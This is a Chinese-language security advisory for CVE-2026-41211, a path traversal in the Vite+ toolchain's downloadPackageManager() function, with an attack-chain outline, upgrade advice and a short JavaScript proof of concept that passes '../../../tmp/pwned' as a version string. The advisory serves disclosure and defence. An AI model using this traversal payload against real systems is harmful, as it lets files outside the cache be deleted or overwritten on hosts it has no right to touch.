IPBUF安全漏洞报告
English
CVE-2026-41211 CVSS 10.0 严重

CVE-2026-41211 Vite+ 路径穿越导致目录写入漏洞

披露日期: 2026-04-23

漏洞信息

漏洞编号
CVE-2026-41211
漏洞类型
路径穿越
CVSS评分
10.0 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Vite+

相关标签

路径穿越CVE-2026-41211Vite+文件系统漏洞RCE

漏洞概述

Vite+是一个统一的Web开发工具链。在0.1.17版本之前,downloadPackageManager()函数存在路径穿越漏洞。由于该函数直接使用不可信的version字符串构建文件系统路径,攻击者可以通过提供../片段或绝对路径,绕过缓存根目录限制,导致Vite+能够删除、替换或填充预期缓存位置之外的任意目录,造成严重的安全风险。

技术细节

该漏洞的核心在于Vite+组件中downloadPackageManager()函数对输入参数的校验缺失。该函数旨在下载并缓存包管理器,但其直接将用户可控的`version`字符串用于构建文件系统路径,且未进行路径穿越检测或规范化处理。攻击者可利用此特性,在version参数中注入`../`序列或绝对路径(如`/tmp/malicious`)。这导致最终的文件操作路径突破预期的`VP_HOME/package_manager/<pm>/`隔离边界。利用该漏洞,攻击者不仅能删除或篡改受影响主机上的任意文件(若权限允许),还能在非预期目录下写入恶意文件,进而可能提权或植入后门。由于CVSS评分为10.0,且无需用户交互,该漏洞极易被自动化攻击利用。

攻击链分析

STEP 1
侦察
攻击者识别目标系统正在使用Vite+ 0.1.17之前的版本。
STEP 2
武器化
攻击者构造包含'../'序列或绝对路径的恶意version字符串,旨在突破缓存目录限制。
STEP 3
投递
攻击者诱使系统调用downloadPackageManager()函数,并传入构造好的恶意version参数。
STEP 4
利用
函数解析路径时跳转至预期目录之外,攻击者成功在系统任意位置执行删除或写入操作。
STEP 5
影响
系统关键文件被篡改或删除,可能导致系统崩溃或被植入后门。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Conceptual PoC for CVE-2026-41211 // Vulnerable function: downloadPackageManager(pm, version) // Attacker controls the 'version' parameter to perform path traversal. const vulnerableModule = require('vite-plus'); // Normal usage: downloadPackageManager('npm', '9.6.7') // Malicious usage: attempting to write to a parent directory // This simulates the payload that triggers the path traversal const maliciousVersion = '../../../tmp/pwned'; console.log(`[+] Attempting to exploit path traversal with version: ${maliciousVersion}`); try { // The function will resolve the path outside the intended cache root vulnerableModule.downloadPackageManager('npm', maliciousVersion); console.log("[+] Potential exploit success: directory created outside cache."); } catch (e) { console.log("[-] Exploit failed or error occurred:", e.message); }

影响范围

Vite+ < 0.1.17

防御指南

临时缓解措施
建议立即升级到Vite+ 0.1.17或更高版本以修复此漏洞。如果无法立即升级,应限制对Vite+环境的访问权限,并监控文件系统的异常写入行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表